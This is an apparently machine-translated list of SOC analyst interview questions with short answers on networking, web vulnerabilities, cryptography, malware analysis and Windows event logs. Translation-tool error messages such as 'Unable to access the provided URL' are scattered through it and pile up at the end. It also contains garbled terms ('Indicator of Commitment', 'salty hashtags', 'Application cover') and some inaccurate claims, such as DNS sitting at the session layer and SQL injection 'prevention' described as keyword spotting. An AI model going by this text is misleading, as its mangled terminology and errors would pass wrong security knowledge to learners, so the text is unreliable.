SOC interview questions

➢ What should one expect?

• Security Analyst
• Incident response
• General
• Red
• Web application security
• Cryptography
• Malware analysis
• Analysis of the event log
• Threat intelligence

✓ Security analyst.
• Basic terminology
• Fundamentals of the network
• Fundamentals of the operating system
• Fundamentals of malware analysis
• How to analyze attacks (phishing, malware...)

✓ Responding to the incident.

• Incident Response Procedure
• How to detect and remediate a specific type of attack (such as golden)
ticket, phishing, etc.)
• Ransomware repair process
❖ Unable to access content from the provided link.
✓ How do you stay up to date on information security?

• Read daily news about information security from different sources.

• Hacker news
• Malwarebytes Laboratories
• HackRead
• ThreatPost
• Following the social media accounts related to cybersecurity.
• Telegram channels
• Participation in newsletters related to cybersecurity

✓ What are the black hat, the white hat, and the gray hat?
• Black Hat: Black-Hat Hackers are those hackers who break into the
system without obtaining permission from the owners. These hackers use the
vulnerabilities as entry points. They hack the systems illegally.
They use their skills to deceive and harm people. (GeeksforGeeks)

• White Hat: White Hat Hackers are also known as

Ethical Hackers. They are certified hackers who learn to hack in courses. They are good.
hackers who try to secure our data and websites. With the rise of the
cyberattacks, organizations and governments have understood that they need to
ethical hackers. (GeeksforGeeks)

• Gray hat: Gray hat hackers are a mix of white hat hackers
black and white. These types of hackers find vulnerabilities in systems without
the permission of the owners. They have no malicious intent. However,
this type of hacking is still considered illegal. But they never share information
with the black hat hackers. They find the problems and report to the
owner, sometimes asking for a small amount of money to fix it.
(GeeksforGeeks)
✓ What is port scanning?
• Port scanning is a method to determine which ports of a network are
open and could be receiving or sending data. It is also a process to
send packets to specific ports of a host and analyze the responses to
identify vulnerabilities. (Avast)

❖ Invalid input. Please provide text for translation.

✓ Do you know any programming languages?

• Although this question depends on you, having basic knowledge of
Programming languages can be an advantage for the interview.

✓ How can the Blue Team and the Red Team be basically defined?
• The red team is the attacking side, the blue team is the defending side.

✓ What is a firewall?
• The firewall is a device that allows or blocks network traffic according to rules.

✓ Explain the security disconfiguration

• It is a security vulnerability caused by an incomplete or incorrect configuration.
✓ Explain the vulnerability.
• Vulnerability: Weakness in an information system, in the procedures of
system security, in internal controls or in the implementation that could be
exploded or activated by a threat source. (source: NIST)

• Risk: the level of impact on the agency's operations (including the functions
of the mission, the image or the reputation), the assets of the agency or the individuals who
result from the operation of an information system given the potential impact of
a threat and the likelihood of that threat occurring. (src: NIST)

• Threat: Any circumstance or event with the potential to adversely impact

the organization's operations, the organization's assets, the individuals, others
organizations or the Nation through a system via unauthorized access, the
destruction, the dissemination, the modification of information and/or the denial of
service. (src: NIST)

✓ What is compliance?
• Following the set of rules authorized by an organization, part
independent or government.

✓ What is MITRE ATT&CK?

• MITRE ATT&CK® is a globally accessible knowledge base on the
tactics and techniques of adversaries, based on real-world observations. The basis
ATT&CK knowledge is used as a basis for the development of models and
specific threat methodologies in the private sector, in government and in
community of cybersecurity products and services. (MITRE ATT&CK)

✓ Do you have any projects we can see?

• If you have any project to showcase, make sure to prepare it before the interview.

✓ Explain 2FA.
• 2FA is an additional layer of security used to ensure that the
people trying to access an online account are who they say they are. At first
place, the user enters their username and a password. Next,
Place to access immediately, you will be asked to provide additional information.
Authy
✓ Could you share some names of security products for points?
finals in general?
• Antivirus
• EDR
• XDR
• DLP

✓ What are HIDS and NIDS?

• HIDS: HIDS stands for Host Intrusion Detection System. The HIDS is located on each
host.
• NIDS: NIDS stands for Network Intrusion Detection System. The NIDS is located on the network.

✓ What is the CIA triad?

• The three letters of the 'CIA triad' stand for Confidentiality, Integrity, and
Availability. The CIA triad is a common model that forms the basis for the
development of security systems. They are used to find vulnerabilities and
methods to create solutions. (Fortinet)

• Confidentiality: Confidentiality involves the efforts of an organization to

ensure that data remains confidential or private. A key component
to maintain confidentiality is to ensure that people without the proper
authorization cannot access important assets for their company.

• Integrity: Integrity consists of ensuring that the data is reliable and

they are not manipulated. The integrity of the data is only maintained if the data
they are genuine, accurate, and reliable.

• Availability: Systems, networks, and applications must work as they should and
when they should. Additionally, people with access to specific information should be able to
consume it when needed, and accessing the data should not take excessive time.
✓ What is the AAA?

• Authentication: Authentication involves a user providing information

about who they are. Users present login credentials that claim
what they say they are. (Fortinet)

• Authorization: Authorization follows authentication. During authorization, it can be

grant a user privileges to access certain areas of a network or
system. (Fortinet)

• Accounting: Accounting keeps a record of user activity.

while they are connected to a network by tracking information such as
the time they were connected, the data they sent or received, their
Internet Protocol (IP) address, the Uniform Resource Identifier (URI)
what they used and the different services they accessed. (Fortinet)
✓ What is the Cyber Kill Chain?
• Developed by Lockheed Martin, the Cyber Kill Chain® framework is part of the model
Intelligence Driven Defense® for the identification and prevention of activity
cyber intrusion. The model identifies what adversaries must complete to
achieve their goal.
• The seven steps of the Cyber Kill Chain® enhance the visibility of an attack and enrich
the analyst's understanding of the adversary's tactics, techniques, and procedures.
Lockheed Martin
✓ What is SIEM?
• Security information and event management (SIEM) is a solution for
security provided by real-time logging of events in an environment. The
The real objective of event logging is to detect security threats.

• In general, SIEM products have a series of characteristics. The ones that interest us the most
SOC analysts are interested in: filtering the data they collect and creating alerts for
any suspicious event.

❖ The provided link does not contain translatable text.

✓ What is the Indicator of Commitment (IOC)?

• Indicators of compromise (IOC) serve as forensic evidence of possible

intrusions in a host system or in a network. These artifacts allow for

information security professionals (InfoSec) and to the administrators of

systems detect attempts of intrusion or other malicious activities. The

security researchers use the IOC to better analyze techniques and

behaviors of a certain malware. The IOCs also provide

information about threats that can be shared with the community to improve

the incident response and correction strategies of the organization.

(TrendMico)

✓ What are Indicators of Attack (IOA)?

• The Indicators of Attack (IOAs) demonstrate the intentions behind a

cyberattack and the techniques used by the threat actor to achieve their
objectives. The specific cyber threats that orchestrate the attack, such as malware, the
ransomware or advanced threats are of little importance when analyzed.
the IOA.
✓ A true positive is a result that correctly identifies a condition or characteristic that is present.

True positive:
• If the situation to be detected and the detected situation (alert activated) are the same, it is about
from a True Positive alert. For example, let's suppose that a
PCR test to see if it is Covid19 positive and the result of the test has been
positive. It is a True Positive because the condition that is intended to be detected (if it has the
Covid19 disease and the detected condition (being a Covid19 patient) are the same.
This is a true positive alert.

• Let's assume there is a rule to detect SQL Injection attacks and this rule is
has been triggered due to a request made to the following URL. The alert is
indeed a 'True Positive' since there was a real Injection attack
SQL.
[Link] 1=1

False positive:
• In summary, it is a false alarm. For example, there is a security camera.
in her house and if the camera alerts her due to the movements of her cat, it is about a
false alert.

• If we look at the example of the URL below, we see the keyword of the parameter
SQL 'Union' within this URL. If a SQL injection alert occurs for
this URL will be a false positive
alert because the keyword "Union" is used to refer to a sports team
here and not for a SQL injection attack.

•
The provided text is a URL and does not contain any translatable content.
✓ What is the OSI model? Explain each layer.

• The Open Systems Interconnection model (OSI model) is a model

concept that describes the universal standard of communication functions
a telecommunications system or a computer system, without taking into account the
underlying internal technology of the system and the specific protocol sets.
(Wikipedia)

• Physical layer: The physical layer is responsible for the transmission and reception of data.
unstructured brutes between a device, such as an interface controller
red, an Ethernet hub or a network switch and a transmission medium
physical. Converts digital bits into electrical, radioelectric, or optical signals.

• Data link layer: The data link layer provides the transfer of
node-to-node data, a link between two directly connected nodes. Detects and
possibly correct the errors that may occur in the physical layer. Define the
protocol for establishing and terminating a connection between two connected devices
physically. It also defines the protocol for flow control between them. IEEE 802
divides the data link layer into two sublayers: a. Medium Access Control layer
medium (MAC) - responsible for controlling how devices on a network obtain
access to a medium and permission to transmit data. b. Logical link control layer
(LLC) - responsible for identifying and encapsulating network layer protocols, and
controls error checking and frame synchronization.

• Network layer: The network layer provides the functional and

procedure to transfer packets from one node to another connected in 'networks'
different.
• Transport layer: The transport layer provides the functional means and
procedure to transfer variable-length data sequences from a host
from a source to a destination host of one application to another across a network,
maintaining quality of service functions. The transport protocols
They can be oriented towards connection or not.

• Session layer: The session layer creates the configuration, controls the connections, and
the disconnection ends, between two or more computers, what is called a 'session'.
Since DNS and other name resolution protocols operate in this part of
the layer, the common functions of the session layer include logging in
user (establishment), the search for names (management) and the log out of
user (completion). Including this matter, the authentication protocols also
are incorporated in most client software, such as the FTP Client and the Client
NFS for Microsoft networks. Therefore, the Session layer establishes, manages, and terminates
the connections between the local and remote application.

• Presentation layer: The presentation layer establishes the format of the data and the
translation of the same to a format specified by the application layer during
the encapsulation of outgoing messages as they pass through the protocol stack,
and it is possibly invested during the decapsulation of incoming messages
when they pass through the protocol stack. For this same reason, the messages
outgoing during encapsulation are converted to a format specified by the layer
of application, while the conversation for incoming messages during the
decapsulation is reversed.

• Application layer: The application layer is the OSI model layer closest to the
end user, which means that both the OSI application layer and the user
interact directly with application programs that implement a
communication component between the client and the server, such as the Browser
files and Microsoft Word. These application programs fall outside the scope of the
OSI model unless they are directly integrated into the application layer through
the communication functions, such as in the case of applications like browsers
web and email programs. Other examples of programs are the
Microsoft networking software for sharing files and printers and the client of
Unix/Linux network file system to access file resources
shared.
✓ What is the three-way handshake?

• TCP uses a three-way handshake to establish a reliable connection.

the connection is full duplex, and both parties synchronize (SYN) and acknowledge receipt
(ACK).

• The client chooses an initial sequence number, set in the first packet.
The server also chooses its own initial sequence number, set at
the SYN/ACK packet.

• Each side recognizes the other's sequence number by incrementing it; this is the
receipt acknowledgement number. The use of sequence numbers and receipt acknowledgments
allows both sides to detect missing or out-of-order segments.

• Once the connection is established, ACKs are usually produced for each
segment. The connection will eventually end with a RST (reset or closure of the
connection) or FIN (end of the connection).
✓ What is the TCP/IP model? Explain the difference between the models.
OSI and TCP/IP.

• The TCP/IP model is the default method of data communication on the Internet. It was
developed by the United States Department of Defense to enable the
accurate and correct data transmission between devices.

• TCP/IP divides communication tasks into layers that maintain the process.
standardized, without hardware and software providers managing it themselves
Same. Data packets must pass through four layers before being received.
by the destination device, then TCP/IP traverses the layers in reverse order to
return the message to its original format.

✓ The TCP/IP model contains four layers. The layers are:

• Application cover
• Transport cover
• Internet Cover
• Network access cover
✓ The difference:

✓ What is ARP?
• The Address Resolution Protocol (ARP) is a communication protocol
used to discover the link layer address, such as a MAC address,
associated with a given Internet layer address, usually an IPv4 address.
This mapping is a critical function in the set of Internet protocols.

✓ What is DHCP?
• The Dynamic Host Configuration Protocol (DHCP) is a management protocol
of network used in Internet Protocol (IP) networks for assigning
automatically assigns IP addresses and other communication parameters to the
devices connected to the network through a client-server architecture.
✓ Could you share some names of network security products?
general?

• Firewall
• IDS
• IPS
• WAF

✓ What is the main difference between IDS and IPS?

• IDS only detect traffic, but IPS can prevent/block traffic.

✓ How can you protect yourself from Man-in-the-middle attacks?

• While the answer to this question varies depending on the scenarios, encryption is the key.
key to being safe.
✓ What are HTTP response codes?
✓ Explain the OWASP Top 10.

• The OWASP Top 10 is a standard awareness document for the

developers and the security of web applications. Represents a wide
consensus on security risks more critical for applications
web. Unable to access the provided URL to extract text for translation.

✓ What is SQL injection?

• SQL injections are critical attack methods in which a web application

directly includes unsanitized data provided by the user in the
SQL queries.

✓ Explain the types of SQL injection.

There are 3 types of SQL injections. These are:

• Band SQLi (classic SQLi): If a SQL query is sent and responded through the
same channel, we call them SQLi in band. It is easier for attackers to exploit them
compared to other categories of SQLi.

• Inferential SQLi (Blind SQLi): The SQL queries that receive a response that does not ...
They are called Inferential SQLi. They are called blind SQLi because the response is not
you can see.

• Out-of-band SQLi: If the response to a SQL query is communicated through a

different channel, this type of SQLi is called out-of-band SQLi. For example, if the
the attacker receives answers to their SQL queries through DNS, this is called
Out-of-band SQLi.
✓ How to prevent SQL injection vulnerability?

• When examining a web request, check all areas that come from the user:
Because SQL injection attacks are not limited to the areas of the
forms, you should also check the HTTP request headers such as User-
Agent.

• Look for the SQL keywords: Look for words like INSERT, SELECT, WHERE
within the data received from users.

• Check for special characters: Look for apostrophes ('), hyphens (-) or
parentheses used in SQL or special characters that are frequently used
in SQL attacks within the data received from the user.

• Familiarize yourself with the most commonly used SQL injection payloads: Although the
SQL payloads vary depending on the web application, attackers continue to use
some common payloads to check for SQL Injection vulnerabilities. If
If you are familiar with these payloads, you will easily detect the payloads.
SQL injection. You can see some SQL injection payloads used with
frequency here.

✓ What is XSS and how can it be prevented?

• Cross-Site Scripting (XSS) attacks are a type of injection, where code is injected
malicious scripts on websites that would otherwise be benign and trustworthy. The
XSS attacks occur when an attacker uses a web application to send
malicious code, usually in the form of client-side scripts, to another
end user. The flaws that allow these attacks to be successful are quite
extended and occur anywhere a web application uses the
user input within the output it generates without validating or encoding it. (OWASP)

• For XSS attacks to be successful, an attacker needs to insert and execute

malicious content on a web page. Each variable in a web application
needs to be protected. Ensure that all variables undergo validation and
whether they are escapes or cleaned, it is known as injection resistance
perfect. Any variable that does not go through this process is a weakness
potential. Frameworks facilitate the correct validation of variables and their
escape or disinfection.

• However, frameworks are not perfect and security gaps still exist.
in popular frameworks like React and Angular. The encoding of the output and the
HTML sanitization helps to address those gaps.
✓ Explain the types of XSS.

1. Reflected XSS (non-persistent): It is a type of non-persistent XSS that the payload

XSS must be included in the request. It is the most common type of XSS.

[Link] XSS (persistent): It is a type of XSS in which the attacker can upload
permanently the payload of XSS in the web application. In comparison to others
Types, the most dangerous type of XSS is stored XSS.

[Link] Based XSS: DOM Based XSS is an XSS attack in which the payload of the attack is
executed as a result of the modification of the DOM 'environment' in the browser of the
victim used by the original client-side script, so that the code of
the client side executes in an 'unexpected' manner. (OWASP)

✓ What is IDOR?
• The Insecure Direct Object Reference (IDOR) is a vulnerability caused
due to the lack of an authorization mechanism or because it is not used
Correctly. It allows a person to access an object that belongs to another.

• Among the greatest security risks of web applications published in the

OWASP 2021, IDOR or 'Broken Access Control' ranks first.

✓ What is the RFI?

• Remote File Inclusion (RFI) is the security vulnerability that
it occurs when a file is included on a different server without sanitizing it
data obtained from a user.
✓ What is LFI?

• Local File Inclusion (LFI) is the security vulnerability that

produced when a local file is included without sanitizing the data obtained from a
user.

✓ Explain the difference between LFI and RFI?

• LFI differs from RFI because the file to be included is in the same
web server where the web application is hosted.

✓ Explain CSRF.

• Cross-Site Request Forgery (CSRF) is an attack that forces a

end user to execute unwanted actions in a web application in which they are
authenticated. With a little help from social engineering (such as sending a link
via email or chat), an attacker can trick users into a
web application for them to carry out actions of their choice. If the victim is a user
Typically, a successful CSRF attack can force the user to make change requests.
state on how to transfer funds, change your email address, etc. If the
the victim is an administrative account, the CSRF can compromise the whole application
web. [Link]

✓ What is the WAF?

UnWAFo web application firewall helps protect web applications by filtering and
supervising the HTTP traffic between a web application and the Internet. It usually protects the
web applications of attacks such as cross-site forgery, cross-site scripting
(XSS), file inclusion and SQL injection, among others. A WAF is a defense against
layer 7 of the protocol (in the OSI model), and it is not designed to defend against all types
of the [Link] provided text is a URL and cannot be translated.
✓ What are encoding, hashing, and encryption?
• Encoding: Convert the data into the desired format required for the
exchange between different systems.

• Hashing: Maintains the integrity of a message or data. Any change made

Any day could be noticed.

• Encryption: It ensures the security of data and requires a code or image of

digital verification to be able to open them or access them.

✓ What is the difference between hashing and encryption?

• Hashing: Hashing is the process of converting information into a key using

a hash function. The original information cannot be retrieved from the hash key by
no means. (GeeksforGeeks)

• Encryption: The ciphering is the process of converting a normal readable message known
as plain text in a junk message or unreadable known as encrypted text. The
encrypted text obtained from the encryption can be easily transformed into text
plan using the encryption key. (GeeksforGeeks)

✓ The difference:
• The hash function does not need a key to operate.
• While the output length can be variable in the algorithms of
encryption, there is a fixed output length in hashing algorithms.
• Encryption is a bidirectional function that includes encryption and decryption, while
that hashing is a one-way function that changes plain text into a
unique compendium that is irreversible.
✓ What are salty hashtags?

• A salt is added to the hash process to enforce its uniqueness, increase its complexity
without increasing user requirements and mitigating password attacks such as the
hash tables.

Unable to access external links or content.

✓ What are the differences between SSL and TLS?

✓ What is the name of the software that compiles written codes?

• Compiler

✓ What is the name of the software that translates machine codes to

assembly language?

• Disassembler

✓ What is the difference between static and dynamic malware analysis?

• Static analysis: It is the approach of analyzing malicious software by

reverse engineering methods without executing it. Generally, when decompiling /
disassembling the malware, each step that the malware will execute is analyzed, by
what can be analyzed is the behavior / the capability of the malware.

• Dynamic analysis: It is the approach that examines the behavior of

malicious software in the system through its execution. In the analysis
dynamic, applications that can examine the system are installed
event logs, files, the network and processes, and their examination is done.
behavior through the execution of malicious software.

• It should also be taken into account that using a single approach may not be
enough to analyze the malware. Using both approaches together will give you
the best results.
✓ How does malware achieve persistence in Windows?

• Services
• Execution keys of the registry (Run, RunOnce)
• Task Scheduler
• Infection to clean files
✓ What event logs are available by default in Windows?

• Security
• Application
• System

✓ With what security event ID can the connection be detected?

Successful RDP?

• 4624

✓ What event identifier can be used to detect logins?

failed?

• 4625

✓ In which field of which event should I look to be able to detect

the RDP logins?

• You can detect RDP login activities with event ID 4624. The value of
"Logon Type" must be 10.
✓ What is Cyber Threat Intelligence (CTI)?

Threat intelligence is the analysis of data using tools and techniques to

generate meaningful information about existing or emerging threats targeting the
organization and help mitigate risks. Threat intelligence helps the
organizations to make faster and more informed security decisions and to change their
reactive to proactive behavior to combat attacks.
Unable to access the content of the provided URL.

✓ What is TAXII in Cyber Threat Intelligence (CTI)?

TAXII, an abbreviation for Trusted Automated eXchange of Intelligence Information, defines how we
Can you share information about cyber threats through services and exchanges of
messages.
What are STIX and TAXII?

✓ Name some threat intelligence platforms

• IBM X Force Exchange, Cisco Talos, OTX AlienVault

✓ What are the types of threat intelligence?

• Intelligence on strategic threats

• Tactical intelligence on threats
• Technical intelligence on threats
• Operational intelligence on threats
Invalid input. Please provide text for translation.

Cannot access external links.

The provided text is a URL and does not contain translatable content.

Unexpected input. Please provide a text for translation.

Unable to access the content of the link provided.

Unable to access the link to retrieve text for translation.

Invalid input. Please provide the text to translate.

The provided text is a URL and does not contain translatable content.

Unable to access the provided URL.